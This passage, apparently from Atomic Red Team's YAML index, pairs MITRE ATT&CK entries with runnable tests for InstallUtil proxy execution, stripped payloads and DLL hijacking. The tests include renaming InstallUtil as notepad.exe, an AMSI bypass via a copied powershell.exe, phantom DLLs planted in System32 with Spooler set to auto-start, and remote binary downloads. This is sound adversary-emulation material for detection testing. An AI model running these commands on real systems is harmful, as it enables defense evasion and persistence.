}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallHelper method call
auto_generated_guid: d43a5bde-ae28-4c55-a850-3f4c80573503
description: |
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: InstallHelper
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "/logfile= /logtoconsole=false `"$InstallerAssemblyFullPath`""
$ExpectedOutput = 'Constructor_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
CommandLine = $CommandLine
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
InstallHelper method execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallUtil class constructor method call
auto_generated_guid: 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
'
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: Executable
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "/logfile= /logtoconsole=false `"$InstallerAssemblyFullPath`""
$ExpectedOutput = 'Constructor_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
CommandLine = $CommandLine
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
InstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallUtil Install method call
auto_generated_guid: 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b
description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: Executable
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "/logfile= /logtoconsole=false /installtype=notransaction /action=install `"$InstallerAssemblyFullPath`""
$ExpectedOutput = 'Constructor_Install_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
CommandLine = $CommandLine
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
InstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallUtil Uninstall method call - /U variant
auto_generated_guid: 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: Executable
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "/logfile= /logtoconsole=false /U `"$InstallerAssemblyFullPath`""
$ExpectedOutput = 'Constructor_Uninstall_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
CommandLine = $CommandLine
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
auto_generated_guid: 06d9deba-f732-48a8-af8e-bdd6e4d98c1d
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: Executable
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `"$InstallerAssemblyFullPath`""
$ExpectedOutput = 'Constructor_Uninstall_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
CommandLine = $CommandLine
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallUtil HelpText method call
auto_generated_guid: 5a683850-1145-4326-a0e5-e91ced3c6022
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
'
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: Executable
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "/? `"$InstallerAssemblyFullPath`""
$ExpectedOutput = 'Constructor_HelpText_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
CommandLine = $CommandLine
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
InstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
name: powershell
- name: InstallUtil evasive invocation
auto_generated_guid: 559e6d06-bb42-4307-bff7-3b95a8254bad
description: |
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "$Env:windir\System32\Tasks"
$InstallerAssemblyFileName = 'readme.txt'
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$CommandLine = "readme.txt"
$ExpectedOutput = 'Constructor_'
# Explicitly set the directory so that a relative path to readme.txt can be supplied.
Set-Location "$Env:windir\System32\Tasks"
Copy-Item -Path "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe" -Destination "$Env:windir\System32\Tasks\notepad.exe"
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = 'Executable'
CommandLine = $CommandLine
InstallUtilPath = "$Env:windir\System32\Tasks\notepad.exe"
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
Evasive Installutil invocation test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
}
cleanup_command: |
Remove-Item -Path "$Env:windir\System32\Tasks\readme.txt" -ErrorAction Ignore
Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallLog" -ErrorAction Ignore
Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallState" -ErrorAction Ignore
Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore
name: powershell
T1027.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97
created: '2022-09-29T18:30:12.244Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/008
external_id: T1027.008
- source_name: intezer stripped binaries elf files 2018
description: 'Ignacio Sanmillan. (2018, February 7). Executable and Linkable
Format 101. Part 2: Symbols. Retrieved September 29, 2022.'
url: https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/
- source_name: SentinelLabs reversing run-only applescripts 2021
description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing
Malicious Run-Only AppleScripts. Retrieved September 29, 2022.
url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
- source_name: Mandiant golang stripped binaries explanation
description: STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang
Internals and Symbol Recovery. Retrieved September 29, 2022.
url: https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:18.337Z'
name: Stripped Payloads
description: |-
Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)
Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Linux
- Windows
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1574.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
created: '2020-03-13T18:11:08.357Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/001
external_id: T1574.001
- source_name: Hijack DLLs CrowdStrike
description: " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries
Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved
January 30, 2025."
url: https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
- source_name: kroll bpl
description: Dave Truman. (2024, June 24). Novel Technique Combination Used
In IDATLOADER Distribution. Retrieved January 30, 2025.
url: https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution
- source_name: Sophos
description: Gabor Szappanos. (2023, May 3). A doubled “Dragon Breath” adds
new air to DLL sideloading attacks. Retrieved October 3, 2025.
url: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
- source_name: Hexacorn DLL Hijacking
description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
Retrieved August 14, 2024.
url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: microsoft remote preloading
description: 'Microsoft. (2014, May 13). Microsoft Security Advisory 2269637:
Insecure Library Loading Could Allow Remote Code Execution. Retrieved January
30, 2025.'
url: https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
- source_name: Microsoft - manifests/assembly
description: Microsoft. (2021, January 7). Manifests. Retrieved January 30,
2025.
url: https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN
- source_name: Microsoft redirection
description: Microsoft. (2023, October 12). Dynamic-link library redirection.
Retrieved January 30, 2025.
url: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN
- source_name: dll pre load owasp
description: OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.
url: https://owasp.org/www-community/attacks/Binary_planting
- source_name: Virus Bulletin
description: 'Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October
5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop
Loader and EntryShell payload. Retrieved October 3, 2025.'
url: https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/
- source_name: unit 42
description: 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22).
Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30,
2025.'
url: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/
- source_name: Wietze Beukema DLL Hijacking
description: Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved
April 8, 2025.
url: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.900Z'
name: 'Hijack Execution Flow: DLL'
description: |-
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- Ami Holeston, CrowdStrike
- Will Alexander, CrowdStrike
- Wietze Beukema @Wietze
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3
description: |
Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - WinAppXRT.dll
auto_generated_guid: 46ed938b-c617-429a-88dc-d49b5c9ffedb
description: ".NET components (a couple of DLLs loaded anytime .NET apps are
executed) when they are loaded they look for an environment variable called
APPX_PROCESS\nSetting the environmental variable and dropping the phantom
WinAppXRT.dll in e.g. c:\\windows\\system32 (or any other location accessible
via PATH) will ensure the \nWinAppXRT.dll is loaded everytime user launches
an application using .NET.\n\nUpon successful execution, amsi.dll will be
copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied
to system32 folder for loading during execution of any .NET application.\n"
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll WinAppXRT.dll
copy %APPDATA%\WinAppXRT.dll %windir%\System32\WinAppXRT.dll
reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f
del %windir%\System32\WinAppXRT.dll
del %APPDATA%\WinAppXRT.dll
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - ualapi.dll
auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
description: |
Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
Print Spooler service is also configured to auto start. Reboot of system is required
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll ualapi.dll
copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
sc config Spooler start=auto
cleanup_command: |
del %windir%\System32\ualapi.dll
del %APPDATA%\ualapi.dll
name: command_prompt
elevation_required: true
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040
description: |
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the created process
type: string
default: calculator.exe
gup_executable:
description: GUP is an open source signed binary used by Notepad++ for software
updates
type: path
default: PathToAtomicsFolder\T1574.002\bin\GUP.exe
dependency_executor_name: powershell
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
'
prereq_command: 'if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
executor:
command: '"#{gup_executable}"
'
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
name: command_prompt
- name: DLL Side-Loading using the dotnet startup hook environment variable
auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
description: 'Utilizing the dotnet_startup_hooks environment variable, this
method allows for registering a global method in an assembly that will be
executed whenever a .net core application is started. This unlocks a whole
range of scenarios, from injecting a profiler to tweaking a static context
